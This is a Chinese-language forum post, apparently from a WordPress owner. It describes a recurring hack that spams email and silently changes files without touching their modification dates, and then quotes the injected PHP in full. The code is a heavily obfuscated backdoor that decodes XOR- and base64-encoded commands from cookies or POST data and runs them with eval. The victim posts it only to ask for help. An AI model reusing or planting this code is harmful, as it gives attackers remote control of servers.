几个星期后,我的WordPress网站被黑了。随机地,黑客修改某些文件的内容,以包含发送数千封垃圾邮件的恶意代码。
我尝试了一切,包括:
我已经安装了WordFence并对两个被黑客攻击的安装启用了全面保护。它会在恶意代码出现时通知我,但我无法找到问题的根源。每次我解决问题,几天后代码出现在其他文件中。
同样重要的是,修改后的文件不具有" Last modified"改性。所以他们以某种方式修改文件而不改变" Last modified"日期戳。
另请注意,文件不会通过FTP或任何其他方法修改,因为除了我之外没有其他任何人登录FTP / cPanel / ssh。
恶意代码是
$g1057 = 482;$GLOBALS['w2625f542']=Array();global$w2625f542;$w2625f542=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['pda9466']="\x4b\x2f\x35\x69\x31\x4c\x66\x60\x7e\x6a\x25\x7d\x27\x7c\x58\x57\x5a\x4a\x7b\x4d\x5d\x2d\x77\x43\x2a\x6b\x2b\x64\x42\x75\x20\x46\x2e\x49\x29\x44\x3c\x54\x68\x45\x5b\x50\x24\xa\x48\x5f\x28\x2c\xd\x70\x56\x22\x3a\x5e\x52\x38\x23\x6c\x33\x62\x39\x6f\x34\x41\x79\x53\x36\x3b\x3f\x67\x3e\x73\x55\x21\x76\x63\x3d\x4e\x37\x9\x4f\x74\x6d\x26\x32\x7a\x51\x30\x47\x78\x61\x72\x40\x65\x71\x59\x5c\x6e";$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][55].$w2625f542['pda9466'][62].$w2625f542['pda9466'][59].$w2625f542['pda9466'][90]]=$w2625f542['pda9466'][75].$w2625f542['pda9466'][38].$w2625f542['pda9466'][91];$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][27].$w2625f542['pda9466'][58].$w2625f542['pda9466'][2].$w2625f542['pda9466'][62].$w2625f542['pda9466'][84].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]=$w2625f542['pda9466'][61].$w2625f542['pda9466'][91].$w2625f542['pda9466'][27];$w2625f542[$w2625f542['pda9466'][69].$w2625f542['pda9466'][2].$w2625f542['pda9466'][75].$w2625f542['pda9466'][2].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62]]=$w2625f542['pda9466'][71].$w2625f542['pda9466'][81].$w2625f542['pda9466'][91].$w2625f542['pda9466'][57].$w2625f542['pda9466'][93].$w2625f542['pda9466'][97];$w2625f542[$w2625f542['pda9466'][22].$w2625f542['pda9466'][87].$w2625f542['pda9466'][84].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][60]]=$w2625f542['pda9466'][3].$w2625f542['pda9466'][97].$w2625f542['pda9466'][3].$w2625f542['pda9466'][45].$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][81];$w2625f542[$w2625f542['pda9466'][74].$w2625f542['pda9466'][87].$w2625f542['pda9466'][4].$w2625f542['pda9466'][87].$w2625f542['pda9466'][58]]=$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][3].$w2625f542['pda9466'][90].$w2625f542['pda9466'][57].$w2625f542['pda9466'][3].$w2625f542['pda9466'][85].$w2625f542['pda9466'][93];$w2625f542[$w2625f542['pda9466'][75].$w2625f542['pda9466'][87].$w2625f542['pda9466'][60].$w2625f542['pda9466'][90].$w2625f542['pda9466'][6].$w2625f542['pda9466'][90].$w2625f542['pda9466'][27].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55]]=$w2625f542['pda9466'][49].$w2625f542['pda9466'][38].$w2625f542['pda9466'][49].$w2625f542['pda9466'][74].$w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][71].$w2625f542['pda9466'][3].$w2625f542['pda9466'][61].$w2625f542['pda9466'][97];$w2625f542[$w2625f542['pda9466'][29].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][4].$w2625f542['pda9466'][66].$w2625f542['pda9466'][75].$w2625f542['pda9466'][27]]=$w2625f542['pda9466'][29].$w2625f542['pda9466'][97].$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][3].$w2625f542['pda9466'][90].$w2625f542['pda9466'][57].$w2625f542['pda9466'][3].$w2625f542['pda9466'][85].$w2625f542['pda9466'][93];$w2625f542[$w2625f542['pda9466'][6].$w2625f542['pda9466'][87].$w2625f542['pda9466'][27].$w2625f542['pda9466'][78].$w2625f542['pda9466'][93].$w2625f542['pda9466'][55].$w2625f542['pda9466'][66].$w2625f542['pda9466'][75]]=$w2625f542['pda9466'][59].$w2625f542['pda9466'][90].$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][66].$w2625f542['pda9466'][62].$w2625f542['pda9466'][45].$w2625f542['pda9466'][27].$w2625f542['pda9466'][93].$w2625f542['pda9466'][75].$w2625f542['pda9466'][61].$w2625f542['pda9466'][27].$w2625f542['pda9466'][93];$w2625f542[$w2625f542['pda9466'][81].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60].$w2625f542['pda9466'][4]]=$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][81].$w2625f542['pda9466'][45].$w2625f542['pda9466'][81].$w2625f542['pda9466'][3].$w2625f542['pda9466'][82].$w2625f542['pda9466'][93].$w2625f542['pda9466'][45].$w2625f542['pda9466'][57].$w2625f542['pda9466'][3].$w2625f542['pda9466'][82].$w2625f542['pda9466'][3].$w2625f542['pda9466'][81];$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][6].$w2625f542['pda9466'][6].$w2625f542['pda9466'][2].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]=$w2625f542['pda9466'][90].$w2625f542['pda9466'][59].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62];$w2625f542[$w2625f542['pda9466'][9].$w2625f542['pda9466'][93].$w2625f542['pda9466'][2].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][27].$w2625f542['pda9466'][59]]=$w2625f542['pda9466'][27].$w2625f542['pda9466'][4].$w2625f542['pda9466'][78].$w2625f542['pda9466'][2].$w2625f542['pda9466'][55].$w2625f542['pda9466'][84].$w2625f542['pda9466'][27];$w2625f542[$w2625f542['pda9466'][97].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][90]]=$_POST;$w2625f542[$w2625f542['pda9466'][25].$w2625f542['pda9466'][75].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][62].$w2625f542['pda9466'][87].$w2625f542['pda9466'][2]]=$_COOKIE;@$w2625f542[$w2625f542['pda9466'][22].$w2625f542['pda9466'][87].$w2625f542['pda9466'][84].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][60]]($w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][91].$w2625f542['pda9466'][61].$w2625f542['pda9466'][91].$w2625f542['pda9466'][45].$w2625f542['pda9466'][57].$w2625f542['pda9466'][61].$w2625f542['pda9466'][69],NULL);@$w2625f542[$w2625f542['pda9466'][22].$w2625f542['pda9466'][87].$w2625f542['pda9466'][84].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][60]]($w2625f542['pda9466'][57].$w2625f542['pda9466'][61].$w2625f542['pda9466'][69].$w2625f542['pda9466'][45].$w2625f542['pda9466'][93].$w2625f542['pda9466'][91].$w2625f542['pda9466'][91].$w2625f542['pda9466'][61].$w2625f542['pda9466'][91].$w2625f542['pda9466'][71],0);@$w2625f542[$w2625f542['pda9466'][22].$w2625f542['pda9466'][87].$w2625f542['pda9466'][84].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][60]]($w2625f542['pda9466'][82].$w2625f542['pda9466'][90].$w2625f542['pda9466'][89].$w2625f542['pda9466'][45].$w2625f542['pda9466'][93].$w2625f542['pda9466'][89].$w2625f542['pda9466'][93].$w2625f542['pda9466'][75].$w2625f542['pda9466'][29].$w2625f542['pda9466'][81].$w2625f542['pda9466'][3].$w2625f542['pda9466'][61].$w2625f542['pda9466'][97].$w2625f542['pda9466'][45].$w2625f542['pda9466'][81].$w2625f542['pda9466'][3].$w2625f542['pda9466'][82].$w2625f542['pda9466'][93],0);@$w2625f542[$w2625f542['pda9466'][81].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60].$w2625f542['pda9466'][4]](0);$reb1=NULL;$lc4d63=NULL;$w2625f542[$w2625f542['pda9466'][94].$w2625f542['pda9466'][60].$w2625f542['pda9466'][87].$w2625f542['pda9466'][93]]=$w2625f542['pda9466'][4].$w2625f542['pda9466'][58].$w2625f542['pda9466'][62].$w2625f542['pda9466'][84].$w2625f542['pda9466'][4].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55].$w2625f542['pda9466'][21].$w2625f542['pda9466'][62].$w2625f542['pda9466'][4].$w2625f542['pda9466'][75].$w2625f542['pda9466'][58].$w2625f542['pda9466'][21].$w2625f542['pda9466'][62].$w2625f542['pda9466'][27].$w2625f542['pda9466'][27].$w2625f542['pda9466'][66].$w2625f542['pda9466'][21].$w2625f542['pda9466'][55].$w2625f542['pda9466'][78].$w2625f542['pda9466'][59].$w2625f542['pda9466'][90].$w2625f542['pda9466'][21].$w2625f542['pda9466'][93].$w2625f542['pda9466'][78].$w2625f542['pda9466'][62].$w2625f542['pda9466'][62].$w2625f542['pda9466'][66].$w2625f542['pda9466'][4].$w2625f542['pda9466'][75].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][90].$w2625f542['pda9466'][55].$w2625f542['pda9466'][27];global$q90e;function d17582d($reb1,$iba462){global$w2625f542;$r88a55e="";for($g25e=0;$g25e<$w2625f542[$w2625f542['pda9466'][69].$w2625f542['pda9466'][2].$w2625f542['pda9466'][75].$w2625f542['pda9466'][2].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62]]($reb1);){for($u18699a=0;$u18699a<$w2625f542[$w2625f542['pda9466'][69].$w2625f542['pda9466'][2].$w2625f542['pda9466'][75].$w2625f542['pda9466'][2].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62]]($iba462)&&$g25e<$w2625f542[$w2625f542['pda9466'][69].$w2625f542['pda9466'][2].$w2625f542['pda9466'][75].$w2625f542['pda9466'][2].$w2625f542['pda9466'][4].$w2625f542['pda9466'][6].$w2625f542['pda9466'][27].$w2625f542['pda9466'][62]]($reb1);$u18699a++,$g25e++){$r88a55e.=$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][93].$w2625f542['pda9466'][55].$w2625f542['pda9466'][62].$w2625f542['pda9466'][59].$w2625f542['pda9466'][90]]($w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][27].$w2625f542['pda9466'][58].$w2625f542['pda9466'][2].$w2625f542['pda9466'][62].$w2625f542['pda9466'][84].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]($reb1[$g25e])^$w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][27].$w2625f542['pda9466'][58].$w2625f542['pda9466'][2].$w2625f542['pda9466'][62].$w2625f542['pda9466'][84].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]($iba462[$u18699a]));}}return$r88a55e;}function abd4($reb1,$iba462){global$w2625f542;global$q90e;return$w2625f542[$w2625f542['pda9466'][9].$w2625f542['pda9466'][93].$w2625f542['pda9466'][2].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][27].$w2625f542['pda9466'][59]]($w2625f542[$w2625f542['pda9466'][9].$w2625f542['pda9466'][93].$w2625f542['pda9466'][2].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][62].$w2625f542['pda9466'][27].$w2625f542['pda9466'][59]]($reb1,$q90e),$iba462);}foreach($w2625f542[$w2625f542['pda9466'][25].$w2625f542['pda9466'][75].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][62].$w2625f542['pda9466'][87].$w2625f542['pda9466'][2]]as$iba462=>$a7d8){$reb1=$a7d8;$lc4d63=$iba462;}if(!$reb1){foreach($w2625f542[$w2625f542['pda9466'][97].$w2625f542['pda9466'][90].$w2625f542['pda9466'][66].$w2625f542['pda9466'][84].$w2625f542['pda9466'][90]]as$iba462=>$a7d8){$reb1=$a7d8;$lc4d63=$iba462;}}$reb1=@$w2625f542[$w2625f542['pda9466'][29].$w2625f542['pda9466'][59].$w2625f542['pda9466'][59].$w2625f542['pda9466'][4].$w2625f542['pda9466'][66].$w2625f542['pda9466'][75].$w2625f542['pda9466'][27]]($w2625f542[$w2625f542['pda9466'][71].$w2625f542['pda9466'][6].$w2625f542['pda9466'][6].$w2625f542['pda9466'][2].$w2625f542['pda9466'][93].$w2625f542['pda9466'][60]]($w2625f542[$w2625f542['pda9466'][6].$w2625f542['pda9466'][87].$w2625f542['pda9466'][27].$w2625f542['pda9466'][78].$w2625f542['pda9466'][93].$w2625f542['pda9466'][55].$w2625f542['pda9466'][66].$w2625f542['pda9466'][75]]($reb1),$lc4d63));if(isset($reb1[$w2625f542['pda9466'][90].$w2625f542['pda9466'][25]])&&$q90e==$reb1[$w2625f542['pda9466'][90].$w2625f542['pda9466'][25]]){if($reb1[$w2625f542['pda9466'][90]]==$w2625f542['pda9466'][3]){$g25e=Array($w2625f542['pda9466'][49].$w2625f542['pda9466'][74]=>@$w2625f542[$w2625f542['pda9466'][75].$w2625f542['pda9466'][87].$w2625f542['pda9466'][60].$w2625f542['pda9466'][90].$w2625f542['pda9466'][6].$w2625f542['pda9466'][90].$w2625f542['pda9466'][27].$w2625f542['pda9466'][6].$w2625f542['pda9466'][55]](),$w2625f542['pda9466'][71].$w2625f542['pda9466'][74]=>$w2625f542['pda9466'][4].$w2625f542['pda9466'][32].$w2625f542['pda9466'][87].$w2625f542['pda9466'][21].$w2625f542['pda9466'][4],);echo@$w2625f542[$w2625f542['pda9466'][74].$w2625f542['pda9466'][87].$w2625f542['pda9466'][4].$w2625f542['pda9466'][87].$w2625f542['pda9466'][58]]($g25e);}elseif($reb1[$w2625f542['pda9466'][90]]==$w2625f542['pda9466'][93]){eval/*g42a*/($reb1[$w2625f542['pda9466'][27]]);}exit();} ?>